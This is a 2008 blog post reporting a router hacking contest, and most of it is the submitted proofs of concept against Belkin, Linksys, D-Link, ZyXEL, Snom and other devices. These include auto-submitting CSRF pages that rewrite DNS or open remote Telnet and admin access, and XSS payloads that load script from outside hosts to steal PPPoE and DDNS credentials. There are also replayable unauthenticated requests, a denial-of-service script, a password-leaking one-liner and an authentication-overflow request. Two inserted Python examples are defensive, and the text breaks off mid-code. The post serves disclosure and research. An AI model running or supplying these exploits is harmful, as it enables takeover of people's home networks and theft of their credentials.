The Router Hacking Contest Results.
Published on: 1204375794
Abstract
The software on routers is a relatively unexplored area. With that in mind, it is no surprise that, with our combined knowledge of network security and web application security, a further exploration of this landscape was only a matter of time. It is easy to see why routers are already being exploited by so-called drive-by malware: if you own the source of the traffic, you can perform almost any command at will. The security landscape keeps shifting, from the network to the web application; this time it shifts to the best of both worlds. As the net becomes richer in technology, so do the attack vectors. Three weeks ago I launched a joint challenge with Gnucitizen to give readers a chance to join in, inspect and hack their own router. It has been a unique contest that caught the attention of many. It is the 1st of March, all submissions are in, and I'm very excited about the results and the exploits that are released. This research is important because it gives us an overview of the kinds of vulnerabilities that exist within routers and other embedded devices.
Hacking Routers
The main problem with many routers is authentication. As is well known, most routers ship with default login credentials. That was not our field of research, because it is a very well known fact; we wanted to see whether there are other ways of attacking a router. Looking at the exploits, it is clear that authentication isn't always mandatory, and where it is, CSRF and JavaScript can still do the work for us. CSRF is almost undeniably the most dangerous method you can imagine for accessing a router remotely. The root of the problem is that routers usually do not use unique session tokens. It can be far worse: if JavaScript injection (XSS) is possible in the router, even proper tokens can fail, and when both are possible the router's security is rendered useless. It is important to understand that many of these attacks can be launched in stealth, which makes this a serious issue to be concerned about.
Conclusion.
A key thing to notice is that web application based attack vectors can literally own the network. With JavaScript and CSRF as our tools it is possible to smash through your network security: your firewalls, your switches, your AV software or any other network based protection measure. If you are into network security and don't know much about web application hacking and security, it is time to start reading up on it. Overall it is time to accept that security isn't solely network based anymore. The vectors below are listed and gathered from the various places where the contest took place. Some are already acknowledged by the vendors, but most of them are zero-days; if you own a router that is listed below, you might want to consult a security expert in order to secure it. The submissions proved to us once again that JavaScript is the main culprit and that CSRF is fatal: it has the capacity to shut down your router or reconfigure it without your knowledge or consent, poisoning your DNS settings, re-routing traffic, tampering with the DMZ, sniffing traffic, and bypassing an expensive firewall or AV. Another interesting observation is that router vendors are oblivious to contemporary hacks. Attacks that use JavaScript or a CSRF scheme are smart, and overlooked by many.
The contest
I promised to choose a winner, and believe me that was hard, because every router is unique in its own way. Mario's VoIP hack was a very impressive one and Gnucitizen posted a whole blog item about that submission [1]. Meathive's submissions are genuinely impressive as well due to the extensive new finds on his router, and Kender joined in with some neat research on how to reverse engineer a router configuration backup file [2]. If I must select a winner that gets my vote, it is Meathive. Kender shares second place with Mario because of the exclusiveness and creativity of their approach to hacking embedded devices. Congratulations to the winners, and of course to all the folks who participated and gave it media attention; you made this contest possible in the first place. The challenge might be over, but you can still join us by submitting your findings at the Gnucitizen project page [x].
References
[1] http://www.gnucitizen.org/projects/total-surveillance-made-easy-with-voip-phones/
[2] http://www.mindmasters.nl/kender/zyxel/
[x] http://www.gnucitizen.org/projects/router-hacking-challenge/
Router issues.
PDP summarized a list of issues that affect routers:
authentication bypass
a-to-c attacks
csrf (cross-site request forgeries)
xss (cross-site scripting)
call-jacking
obfuscation/encryption deficiencies
UPnP, DHCP and mDNS problems
SNMP injection attacks due to poor SNMP creds.
memory overwrites
stealing config files
cross-file upload attacks
remote war-driving
factory restore attacks
information disclosure
etc, etc, etc
The submissions.
@author: loftgaia
@Router model: F5D7230-4
@Manufacturer: Belkin
I have found a weakness in the way this router maintains access to the control panel.
After a user enters the password successfully in the control center,
the router maintains access just by checking the IP address.
Let's suppose I have two computers in my LAN:
PC1 - 192.168.2.3
PC2 - 192.168.2.5
I log in to the control panel of the router with PC1.
With PC2 I just need to change my IP address: ifconfig eth0 192.168.2.3
and then I can change any settings in the router with PC2:
DNS settings, firewall rules, IP forwarding, etc.
@author: loftgaia
@Router model: F5D7230-4
@Manufacturer: Belkin
I now have managed to change router configuration options without even logging in.
If I try to access the html pages of the router it will ask for a password,
but not the script that handles the request itself.
So we just need to replay the HTTP packets that actually perform the action.
*No* authentication or spoofing is required.
HTTP headers:
POST /cgi-bin/setup_dns.exe
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://192.168.2.1/setup_dns.stm
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
HTTP body:
page=setup_dns&logout=&dns1_1=1&dns1_2=1&dns1_3=1&dns1_4=1&dns2_1=2&dns2_2=2&dns2_3=2&dns2_4=2
After sending this the primary DNS server IP address will be changed to 1.1.1.1 and the secondary DNS server to 2.2.2.2.
I have tried changing other options without a password and it worked all the time: disable firewall, reset to factory defaults, etc. The page will still ask for a password; too bad the script didn't.
This can obviously be triggered remotely in at least a couple of ways.
Tomorrow I will be buying a new router.
@author: loftgaia
@Router model: F5D7230-4
@Manufacturer: Belkin
Found another one. This time it only causes a DoS.
http://d2.myfreefilehosting.com/d1/panel_dos.rb
#!/usr/bin/env ruby
#Author:loftgaia
#Router: Belkin Wireless G Router F5D7230-4
#After running this script nobody in the LAN
#will be able to connect to the router control center.
#A router restart is required to resume normal operation.
#Internet traffic is still allowed to pass through, this only causes a
#DoS on the control center.
#If we send a POST request with a Keep-Alive
#header plus some random content in the body and
#immediately close the socket, any connections to
#the control center from that point on are just
#dropped by the router from *any* source.
require 'socket'
sock = TCPSocket.new('192.168.2.1', 80)
request = <<EOF
POST /cgi-bin/setup_virtualserver.exe HTTP/1.1
Host: 192.168.2.1
Keep-Alive: 50
Connection: Keep-Alive
Content-Type: text/plain
Content-Length: 10

ansdfert=1
EOF
# HTTP wants CRLF line endings; the escape sequences of the original gsub!
# were lost in extraction, so "\n" -> "\r\n" is the assumed intent.
request.gsub!("\n", "\r\n")
puts sock.write(request).to_s + ' written '
sock.close
@author: dzman
@Router model: WRT300N Firmware Version: 2.00.20
@Manufacturer: LinkSys
I've had some fun with my router: LinkSys WRT300N Firmware Version: 2.00.20
Basically it uses XSS; the user does need to be logged into the admin area of the router for this to work. This will fetch the username/password of my PPPoE login, but with small modifications you can steal/adjust anything you want. Does not work in IE, probably some small problem, but I don't use IE so whatever. Firefox and Safari are OK.
Html file:
<iframe name='inp' style='display:none'></iframe>
<form method='post' action='http://192.168.1.1' target='inp'>
<input type='hidden' name='ddns' value='ddnsorg'>
<input type='hidden' name='dyndns_user' value='user'>
<input type='hidden' name='dyndns_pw' value='pass'>
<input type='hidden' name='dyndns_domain' value='"><script src=http://localhost/router.js></script>'>
<input type='hidden' name='ddns_mode' value='Dynamic'>
<input type='hidden' name='ddns_backup' value='disable'>
<input type='hidden' name='ddns_wildcard' value='disable'>
<input type='hidden' name='Static' value='Update'>
<input type='hidden' name='tzo_user' value=''>
<input type='hidden' name='tzo_pw' value=''>
<input type='hidden' name='tzo_domain' value=''>
<input type='hidden' name='h_ddns' value='ddnsorg'>
<input type='hidden' name='h_ddns_mode' value='Dynamic'>
<input type='hidden' name='h_ddns_backup' value='disable'>
<input type='hidden' name='h_ddns_wildcard' value='disable'>
<input type='hidden' name='todo' value='connect_ddns'>
<input type='hidden' name='this_file' value='Setup_DDNS.htm'>
<input type='hidden' name='next_file' value='Setup_DDNS.htm'>
<input type='hidden' name='message' value=''>
</form>
<script type='text/javascript'>
window.onload = function() {
document.forms[0].submit();
}
</script>
Javascript file:
<script>
var ss = document.createElement('iframe');
ss.src = '/setup.cgi?next_file=Setup.htm';
ss.setAttribute('onload', 'test()');
var hh = document.getElementsByTagName('body')[0];
hh.appendChild(ss);
function test() {
var oDoc = (ss.contentWindow || ss.contentDocument);
if (oDoc.document) oDoc = oDoc.document;
var d = ss.contentDocument;
var user = d.getElementsByName('PppoeUserName')[0].value;
var pass = d.getElementsByName('PppoePasswd')[0].value;
alert(user + '-' + pass);
}
</script>
@author: .mario
@Router type: none, VoIP system.
@Manufacturer: Snom
There's a VoIP solution called Snom 320 - more info on that beast here: [www.snom.com]. It comes with a central phone server which features a web front-end. This thing can't be password protected - I don't know why, but it just is that way. There's an input field labeled 'Call a number' - and this is done via regular POST - no JS, no token - nothing. So - if you manage to get someone with this thing in his intranet to visit a prepared site of yours, you can make his phone do loads of calls to everywhere in the world.
[update]
If you let the victim call yourself and you answer the phone, you can hear the victim talk without him knowing that you are listening. Well done, Snom :)
[/update]
But - you might say - the victim will notice when watching his logs! Nope - he won't. The logging application is a Flash file called snomControl.swf. If you call, let's say, 100 numbers in a place really far away, you just have to make sure the last number you call is - tada:
"');
After that, all other numbers that have ever been called aren't visible in the log anymore, since the Flash app kind of crashes internally and only shows the calls made after the above mentioned one. I was too lazy to decompile it - maybe later. So - CSRF all over the place, but isn't it boring to just get the user to make calls when he visits your prepared site? Yes - it is! You can CSRF a nice persistent XSS into the address book. So anytime the user visits it you can execute your script and do other stuff - like data mining, more calls, even some more calls and so on.
There is XSS which also enables you to XHR yourself through the whole front-end and change arbitrary settings, like display names on the phone display, read out settings and anything else you want. Might be bad if you call your boss and some f-words appear on his display. Well, that's it for now - as said, I dunno if this really counts, but I consider it a funny find anyway ;)
@author: mutax
@Router type: Speedport W500 DSL-Router
@Manufacturer: Deutsche Telekom
Bash one-liner for the Deutsche Telekom Speedport W500 DSL-Router (not the one running Linux) to get the logon password from the - well - login page:
wget -q -O - 10.1.1.1/b_banner.stm | sed -n "s/^pwd = '\(.*\)';/your routers password: \1/p"
your routers password: xxxx
That router seems to be a bug itself ;)
mutax
@author: Gareth Heyes
@Router type: DSL-G604T
@Manufacturer: DLink
I finally sat down and wrote a PoC for my router, a DLink DSL-G604T. It's probably going in the bin after this :) I can read any file on the router remotely and the entire thing can be CSRF'd to death. In the sample code I show how to read the config file (or any other file) and change the DNS settings to anything you like.
<html>
<head>
<title>DLink DSL-G604T Exploit</title>
<script>
function readConfig() {
  login();
  setTimeout(function() {
    xss('"><iframe src="http://192.168.1.1/cgi-bin/webcm?getpage=/etc/config.xml" onload="alert(this.contentWindow.document.body.innerHTML);">');
  }, 2000);
}
function xss(payload) {
  ifrm = document.getElementById('iframe');
  ifrm.contentWindow.location = 'http://192.168.1.1/cgi-bin/webcm?getpage=../html/advanced/portforw.htm&var:pagename=fwan&var:category=' + payload;
}
function login() {
  var f = document.createElement('form');
  f.action = 'http://192.168.1.1/cgi-bin/webcm';
  f.innerHTML = '<input type="hidden" name="getpage" value="../html/home.htm"><input type="hidden" name="errorpage" value="../html/index.html">';
  f.innerHTML += '<input type="hidden" name="login:command/username" value="admin"><input type="hidden" name="login:command/password" value="admin">';
  f.innerHTML += '<input type="hidden" name="var:errormsg" value="Error">';
  f.target = 'iframe';
  f.method = 'post';
  document.body.appendChild(f);
  f.submit();
}
function post(url, fields) {
  var p = document.createElement('form');
  p.action = url;
  p.innerHTML = fields;
  p.target = 'iframe';
  p.method = 'post';
  document.body.appendChild(p);
  p.submit();
}
function changeDNS(server) {
  login();
  setTimeout(function() {
    var fields = '<input type="hidden" name="getpage" value="../html/setup/dns.htm">';
    fields += '<input type="hidden" name="resolver:settings/nameserver1" value="' + server + '">';
    fields += '<input type="hidden" name="resolver:settings/nameserver2" value="' + server + '">';
    fields += '<input type="hidden" name="dproxy:settings/state" value="2">';
    post('http://192.168.1.1/cgi-bin/webcm', fields);
  }, 2000);
  setTimeout(function() {
    post('http://192.168.1.1/cgi-bin/webcm', '<input type="hidden" name="logic:command/save" value="../html/tools/syscommnd.htm">');
  }, 5000);
}
window.onload = function() {
  //readConfig();
  changeDNS('2.2.2.2');
}
</script>
</head>
<body>
<iframe name='iframe' id='iframe'></iframe>
</body>
</html>
@author: beford
@Router type: P-660HW Series
@Manufacturer: ZyXEL
I'm using a ZyXEL P-660HW Series [www.zyxel.com]. There is a lot of CSRF stuff on this router: it can be used to change DNS servers, add keywords to the banned list on URL; it's also affected by the IP-based session management attacks mentioned on gnucitizen, and to authenticate you only need a password, which by default is 'admin'. I created two simple proofs of concept abusing an XSS flaw which requires the user to be logged on.
hxtp://192.168.1.1/Forms/DiagGeneral_2?PingIPAddr=d=<script src=http://beford.org/stuff/r1.js></script>
hxtp://192.168.1.1/Forms/DiagGeneral_2?PingIPAddr=d=<script src=http://beford.org/stuff/r2.js></script>
Javascript source code, and two screenshots for reference:
src: http://beford.org/stuff/r1.js
shot: http://beford.org/stuff/img/r1.png
function x() { if (window.XMLHttpRequest) return new XMLHttpRequest();
else return new ActiveXObject('Microsoft.XMLHTTP');}
function regexftw() {
  if (z.readyState == 4) {
    zx = /<td>([\w.]{4,300})<\/font>/g;
    var result, hm = '';
    while ((result = zx.exec(z.responseText)) != null) {
      if (hm.search(result[1]) == -1)
        hm = '<li>' + result[1] + '</li>' + hm;
    }
    document.body.innerHTML = ('You have recently visited: <br> <ul>' + hm + '</ul>');
  }
}
z = x();
z.open('GET', '/ViewLog.html', true);
z.onreadystatechange = regexftw;
z.send(null);
src: http://beford.org/stuff/r2.js
shot: http://beford.org/stuff/img/r2.png
function x() { if (window.XMLHttpRequest) return new XMLHttpRequest();
else return new ActiveXObject('Microsoft.XMLHTTP');}
function regexftw() {
  if (z.readyState == 4) {
    zx = /NAME="sysDNSHost" SIZE="32" MAXLENGTH="71" VALUE="([\w.]+)"/;
    if ((m = zx.exec(z.responseText)) != null) {
      sysDNSHost = m[1];
      zx = /NAME="sysDNSEmail" SIZE="32" MAXLENGTH="63" VALUE="([a-zA-Z0-9_.-]+@[a-zA-Z0-9-]+\.+[a-zA-Z0-9]{2,4})"/;
      m = zx.exec(z.responseText);
      sysDNSEmail = m[1];
      zx = /NAME="sysDNSUser" SIZE="32" MAXLENGTH="31" VALUE="([\w.]+)"/;
      m = zx.exec(z.responseText);
      sysDNSUser = m[1];
      zx = /NAME="sysDNSPassword" SIZE="32" MAXLENGTH="31" VALUE="([\w.]+)"/;
      m = zx.exec(z.responseText);
      sysDNSPassword = m[1];
      alert('Host: ' + sysDNSHost + '\nEmail: ' + sysDNSEmail + '\nUser: ' + sysDNSUser + '\nPassword: ' + sysDNSPassword);
    }
  }
}
z = x();
z.open('GET', '/rpDyDNS.html', true);
z.onreadystatechange = regexftw;
z.send(null);
@author: Jonas
@Router type: DI604
@Manufacturer: DLINK
I'm using a DLINK-DI604 router, which is surely one of the most popular ones here where I live.
The first thing I tried resulted in an XSS:
http://192.168.0.1/prim.htm?rc=_&rf='>alert(1)
http://pastebin.com/m5ad456b3
http://192.168.0.1/prim.htm?rc=_&rf='><script>alert(1)</script>
@author: kender
@Router type: P-2602HW-D1A
@Manufacturer: Zyxel
Description: All-in-one ADSL2+ VoIP IAD for SOHO
Firmware: V3.40(AJZ.1)
Default IP: 192.168.1.254
Once you log in, your IP is whitelisted for 5 minutes (default value, see below). There is no CSRF protection. Examples:
http://192.168.1.254/Forms/RemMagWWW_1?serverWebPort=80&WWWAccessInterface=00000000
will open up the admin web interface to the internet.
http://192.168.1.254/Forms/rpSysAdmin_1?StdioTimout=0
will set the IP whitelisting timeout to unlimited.
When someone is logged in to the interface, requesting an admin url from a different IP in the LAN produces a message stating that the object is Protected. When no-one is logged in you get the login page. Thus it is possible to tell when someone is logged in.
Protection:
- Set the Maintenance > System > General > Administrator Inactivity Timer very low.
- Make sure you do not access any web resource while administering the device and for x minutes afterwards.
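Loftgaia's Belkin findings (a login that whitelists the client IP while setup_dns.exe checks nothing) and kender's ZyXEL IP whitelisting above share one root cause. The following is an added example, not code from any submission or vendor: a small model of that design next to a hardened one that ties the session to a random cookie, enforces it inside the settings handler itself, and requires a per-session CSRF token plus a same-origin Origin/Referer. The Request class, both router classes and the 192.168.2.1 origin are constructed for the demonstration.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urlsplit

ROUTER_ORIGIN = "http://192.168.2.1"   # LAN address of the Belkin in loftgaia's post


@dataclass
class Request:
    """Constructed stand-in for one HTTP request reaching the router's web server."""
    client_ip: str
    path: str
    form: dict
    cookies: dict = field(default_factory=dict)
    origin: Optional[str] = None    # Origin (or Referer) header as the browser sent it


class IpWhitelistRouter:
    """Models the findings: login whitelists the client IP, the HTML page checks that
    list, and the CGI that actually applies the settings checks nothing at all."""

    def __init__(self, password: str = "admin"):
        self._password = password
        self.logged_in_ips = set()
        self.dns = ("192.168.2.1", "192.168.2.1")

    def login(self, req: Request, password: str) -> bool:
        if not hmac.compare_digest(password, self._password):
            return False
        self.logged_in_ips.add(req.client_ip)        # identity == source address
        return True

    def control_panel(self, req: Request) -> bool:
        return req.client_ip in self.logged_in_ips   # take over the IP and you are in

    def setup_dns(self, req: Request) -> bool:
        # No check: a replayed POST from any LAN host, or a cross-site form, succeeds.
        self.dns = (req.form["dns1"], req.form["dns2"])
        return True


class SessionRouter:
    """Hardened variant: a random session cookie identifies the admin instead of the
    source IP, the settings handler enforces it, every state change needs the
    per-session CSRF token, and a foreign Origin/Referer is refused."""

    def __init__(self, password: str):
        self._password = password
        self.sessions: dict = {}          # session id -> CSRF token
        self.dns = ("192.168.2.1", "192.168.2.1")

    def login(self, req: Request, password: str) -> Optional[dict]:
        if not hmac.compare_digest(password, self._password):
            return None
        sid, csrf = secrets.token_urlsafe(32), secrets.token_urlsafe(32)
        self.sessions[sid] = csrf
        return {"sid": sid, "csrf": csrf}   # sid goes in a cookie, csrf into the form

    def _same_origin(self, origin: Optional[str]) -> bool:
        if origin is None:
            return True      # browsers of the era may send neither header; the token still protects
        parts = urlsplit(origin)
        return f"{parts.scheme}://{parts.netloc}" == ROUTER_ORIGIN

    def _authorised(self, req: Request) -> bool:
        expected = self.sessions.get(req.cookies.get("sid", ""))
        if expected is None:
            return False                              # no valid session cookie
        if not self._same_origin(req.origin):
            return False                              # cross-site request
        return hmac.compare_digest(req.form.get("csrf", ""), expected)

    def setup_dns(self, req: Request) -> bool:
        if not self._authorised(req):
            return False
        self.dns = (req.form["dns1"], req.form["dns2"])
        return True
```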
@author: nexact
@Router type: WiMax ProST
@Manufacturer: Airspan
Hardware Rev: 4.1
Software Ver: 6.5.38.0
Picture: http://tinyurl.com/32vloa
VulnType: Authentication bypass
There are not a lot of options to configure in this antenna, but actually it's possible to 'scrap' the antenna by sending a corrupted firmware, or you could simply bind it to another WiMax base station. How to exploit it? Pretty simple: once you successfully log into the administration panel, it pops up a webpage with all settings and POST forms. Each setting is then accessed by sending a POST request to /process_adv/. The problem is that /process_adv/* is not validating if a user is authenticated.. so an attacker can access any option by forging a POST request. I've used BurpProxy to find out this one, kinda easy.. Set your IE proxy to localhost:8080 and run BurpProxy, make any type of HTTP request to your antenna and change the request:
POST /process_adv/ HTTP/1.1
Host: 10.0.0.1
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

DialogText=&Advanced=1
I'm currently debugging the firmware to find out if the password is stored in cleartext in the EEPROM, and maybe... there's a backdoor in it? :-) Port 23 is open and it runs VxWorks.
@author: diesl0w
@Router type: DWL 2100AP
@Manufacturer: D-Link
There is a configuration disclosure on the D-Link DWL 2100AP that allows the configuration to be downloaded via a web browser by making a regular request to any file with .cfg as an extension: http:///config.cfg. This will give the AP's configuration including admin passwords, encrypted key, allowed MACs, etc.
Part of the configuration disclosed is below:
# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 154
login admin
DHCPServer
Eth_Acl
nameaddr 0.0.0.0
domainsuffix
IP_Addr 10.10.10.166
IP_Mask 255.255.255.0
Gateway_Addr 10.10.10.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password ##EDITED##
passphrase
wlan1 passphrase ##EDITED##
passphraseKey 00000000000000000000000000000000000000000000000000000000000000000000000000000000
wlan1 passphraseKey 1b911ae850d9ce61053b0d03ca901f593a776fd514dfc31313506f419a998feadc6fad570a57e58f
version 2
rbcnt 86
I disclosed a doc and video of this sometime last year, so it's not brand new, but still interesting!
@author: kender
@Router type: P-2602HW-D1A
@Manufacturer: ZyXEL
For the Router Hacking Challenge Adrian Pastor was wondering if anyone knew how to read the configuration backup file that you can download from your ZyXEL router.
I happen to have a ZyXEL gateway as well, a P-2602HW-D1A to be precise, so I decided to take a look.
After looking at several of these files (called 'rom-0' when downloaded) I came up with the following structure:
There are two blocks in my file, one for memory and one for files, I guess.
They start at 0x00000000 and 0x00002000 respectively and look like this:
BYTE blocknumber
BYTE unknown
WORD nr of objects
DWORD blockLength
foreach object:
    CHAR[14] objectname
    DWORD uncompressed size
    DWORD compressed size
    DWORD offset to data from start of block
And there we encounter our first problem: the files can be compressed. For me the first block mentioned a 'dbgarea', and the second block 'boot', 'spt.dat' and 'autoexec.net'. But only the spt.dat seems to be compressed.
Since the other files show little of interest, this is also the file we're interested in.
Now to figure out the type of compression..
The first 32 bytes of my file look like this:
CE ED DB DB 00 03 00 09 00 00 06 84 08 00 00 ED 67 3B 5B 6D B0 00 0C 00 09 00 00 00 C8 4C 20 00
At first I had a hunch it might be LZW compression, because that is often used in embedded devices, but I could not make it work on the data I had. Google also turned up nothing useful for me.
So I decided to reverse engineer the firmware for my device to find the routines that read and write the spt.dat file.
I'm not going to go into the reversing itself today, but all I needed was this site and IDA Pro 5.1.
From the disassembly I managed to figure out this structure for the spt.dat file:
DWORD Unclear (Load-address?, Magic?, Endianness?)
WORD Major Version
WORD Minor version
DWORD Unclear (Chunks?)
until EOF:
    WORD org_size
    WORD raw_size
    BYTE[raw_size] Compressed data
The decompression routines were a bit too big and complicated for me to follow, since I'm no star at MIPS processors.
But I did find references to files called 'lzsc.c' and 'lzsd.c'.
A quick Google led me to the Stac LZS compression mechanism described in ANSI X3.241-1994.
I could not quickly find an implementation or tool to decompress the spt.dat,
so I went ahead and started writing my own implementation in C#:
http://www.mindmasters.nl/kender/zyxel/configreader.zip
It still has some bugs in it so the decompression is not perfect, but it is good enough to read all settings like passwords, SNMP community strings, WEP keys etc.
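As an added example (not kender's C# tool), here is a parser for the rom-0 block layout and the spt.dat chunk layout he describes, run over a constructed image. It assumes big-endian fields, which is what makes his first 32 bytes read as major 3, minor 9 and a first chunk with org_size 0x0800 and raw_size 0xED; the sample image and object contents are made up, and LZS decompression of the chunks is left out.

```python
import struct
from dataclasses import dataclass
from typing import List, Tuple

# ASSUMPTIONS: big-endian fields (the dump's 00 03 / 00 09 / 08 00 / 00 ED read as
# major 3, minor 9, org_size 0x0800, raw_size 0xED that way) and the two block bases
# kender reports. Flip ENDIAN to "<" if another firmware disagrees.
ENDIAN = ">"
BLOCK_BASES = (0x0000, 0x2000)

BLOCK_HDR = struct.Struct(ENDIAN + "BBHI")   # blocknumber, unknown, nr of objects, blockLength
OBJ_HDR = struct.Struct(ENDIAN + "14sIII")   # objectname, uncompressed size, compressed size, offset
SPT_HDR = struct.Struct(ENDIAN + "IHHI")     # unclear dword, major, minor, unclear dword
CHUNK_HDR = struct.Struct(ENDIAN + "HH")     # org_size, raw_size


@dataclass
class RomObject:
    name: str
    uncompressed_size: int
    compressed_size: int
    offset: int          # from the start of the block
    data: bytes          # raw (possibly LZS-compressed) bytes

    @property
    def compressed(self) -> bool:
        return self.compressed_size != self.uncompressed_size


@dataclass
class RomBlock:
    number: int
    unknown: int
    length: int
    objects: List[RomObject]


def parse_block(image: bytes, base: int) -> RomBlock:
    number, unknown, nobj, length = BLOCK_HDR.unpack_from(image, base)
    block = image[base:base + length]
    objects, pos = [], BLOCK_HDR.size
    for _ in range(nobj):
        raw_name, usize, csize, off = OBJ_HDR.unpack_from(block, pos)
        pos += OBJ_HDR.size
        name = raw_name.split(b"\0", 1)[0].decode("ascii", "replace")
        if off + csize > len(block):
            raise ValueError(f"object {name!r} runs past the end of block {number}")
        objects.append(RomObject(name, usize, csize, off, block[off:off + csize]))
    return RomBlock(number, unknown, length, objects)


def parse_rom0(image: bytes) -> List[RomBlock]:
    return [parse_block(image, b) for b in BLOCK_BASES if b + BLOCK_HDR.size <= len(image)]


def split_spt_chunks(spt: bytes) -> dict:
    """Split a raw spt.dat into (org_size, compressed bytes) chunks. LZS decoding of
    each chunk is the step kender's tool performs and is not done here."""
    _unclear1, major, minor, _unclear2 = SPT_HDR.unpack_from(spt, 0)
    chunks: List[Tuple[int, bytes]] = []
    pos = SPT_HDR.size
    while pos + CHUNK_HDR.size <= len(spt):
        org, raw = CHUNK_HDR.unpack_from(spt, pos)
        pos += CHUNK_HDR.size
        if pos + raw > len(spt):
            raise ValueError("truncated chunk in spt.dat")
        chunks.append((org, spt[pos:pos + raw]))
        pos += raw
    return {"version": (major, minor), "chunks": chunks}


def build_block(number: int, objects: List[Tuple[str, int, bytes]]) -> bytes:
    """Pack a block for the constructed sample image (inverse of parse_block)."""
    hdr_size = BLOCK_HDR.size + OBJ_HDR.size * len(objects)
    table, data = b"", b""
    for name, usize, payload in objects:
        table += OBJ_HDR.pack(name.encode().ljust(14, b"\0"), usize, len(payload),
                              hdr_size + len(data))
        data += payload
    return BLOCK_HDR.pack(number, 0, len(objects), hdr_size + len(data)) + table + data


def sample_image() -> bytes:
    """Constructed rom-0 with the object names from the post; spt.dat carries two
    chunks of made-up 'compressed' bytes behind a header shaped like the dump's."""
    spt = (SPT_HDR.pack(0xCEEDDBDB, 3, 9, 0x684)
           + CHUNK_HDR.pack(0x0800, 6) + b"LZS#01"
           + CHUNK_HDR.pack(0x00C8, 4) + b"LZS2")
    block0 = build_block(0, [("dbgarea", 16, b"debug area data!")])
    block1 = build_block(1, [("boot", 4, b"boot"),
                             ("spt.dat", 0x800 + 0xC8, spt),
                             ("autoexec.net", 9, b"ip status")])
    return block0.ljust(BLOCK_BASES[1], b"\xff") + block1
```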
@author: Ronald van den Heetkamp
@Router type: Prestige series.
@Manufacturer: ZyXEL.
Abstract:
The router range has multiple CSRF issues, but no apparent XSS holes to mention. Exploiting the router requires the admin to be logged into it; if we can achieve this, it is possible to change ALL settings automatically. The CSRF example below grants remote Telnet access, which could be used to attack the admin's system further.
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html>
<head></head>
<body>
<FORM METHOD='POST' ACTION='http://192.168.1.xxx/Forms/rpRManage_1' name='RMCform'>
<input name='serverTelnetAccess' value='00000000'>
<INPUT TYPE='TEXT' NAME='serverTelnetPort' value='23'>
<INPUT TYPE='TEXT' NAME='serverTelnetClientIP' VALUE='192.168.1.2'>
<input NAME='serverFtpAccess' VALUE='00000000'>
<INPUT TYPE='TEXT' NAME='serverFtpPort' VALUE='21'>
<INPUT TYPE='TEXT' NAME='serverFtpClientIP' VALUE='192.168.1.2'>
<input NAME='serverWebAccess' VALUE='00000000'>
<INPUT TYPE='TEXT' NAME='serverWebPort' VALUE='80'>
<INPUT TYPE='TEXT' NAME='serverWebClientIP' VALUE='0.0.0.0'>
<INPUT TYPE='SUBMIT' NAME='RManagesubmit1' VALUE='Apply'>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
@author: ikki
@Router type: Boa/0.93.15 (with Intersil Extensions) based systems (i.e. FreeLan 802.11g Wireless Access
@Manufacturer: Boa/0.93.15 (with Intersil Extensions) based systems (i.e. FreeLan 802.11g Wireless Access
Secure Network - Security Research Advisory
Vuln name: HTTP Basic Authentication Bypass
Systems affected: Boa/0.93.15 (with Intersil Extensions) based systems (i.e. FreeLan 802.11g Wireless Access
Point (RO80211G-AP))
Severity: High
Local/Remote: Remote
Vendor URL: http://www.boa.org - http://isl3893.sourceforge.net - http://www.roper-europe.com
Author(s): Luca 'ikki' Carettoni - luca.carettoni@securenetwork.it, Claudio 'paper' Merloni - claudio.merloni@securenetwork.it
Vendor disclosure: 24th August 2007
Vendor acknowledged: -
Vendor patch release: -
Public disclosure: 10th September 2007
Advisory number: SN-2007-02
Advisory URL: http://www.securenetwork.it/advisories/
*** SUMMARY ***
Boa is a single-tasking HTTP server. That means that, unlike traditional web servers, it does not fork for each incoming connection, nor does it fork many copies of itself to handle multiple connections. Boa is very low on hardware usage and is therefore used on many embedded systems, including routers, wireless access points and portable devices. The Intersil isl3893 is an ARM9 System on Chip for wireless access points. The goal of the project is to make an embedded distribution built around uClibc and uClinux. It is possible to overwrite the 'admin' password in memory, thus allowing an attacker to gain access to the web interface and alter configuration parameters. This vulnerability can be combined with another known vulnerability (CVE-2000-0920) to read arbitrary files from the device filesystem.
It's important to notice that the Boa httpd doesn't have any authentication code built in; the flaw is inside the Intersil extensions, but we can't confirm it because no source code is released.
*** VULNERABILITY DETAILS ***
When asked for HTTP basic authentication credentials, it is possible to fill up the stack memory of the boa process by passing a string longer than 127 characters as username. In that situation the string passed as password will overwrite the current in-memory value of the admin password, thus enabling the attacker to reset it to a known value. Once the password is reset, the attacker of course has access to the configuration panel.
As an example, the password can be set to 'owned' by sending the following request to the web server:
GET / HTTP/1.1
Host: 192.168.0.1
Authorization: Basic
YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFh
YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFh
YWFhYWFhYWFhYWFhYTpvd25lZA==
The basic authorization header parameter contains the base64/mime encoded string
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:owned'
*** EXPLOIT ***
The vulnerability can be exploited through a simple HTTP request, i.e. using a common web browser (using the authentication credentials specified above).
The following snippet of Python code can be used to reproduce the issue:
###### CUT HERE ######
#!/usr/bin/env python
import urllib2
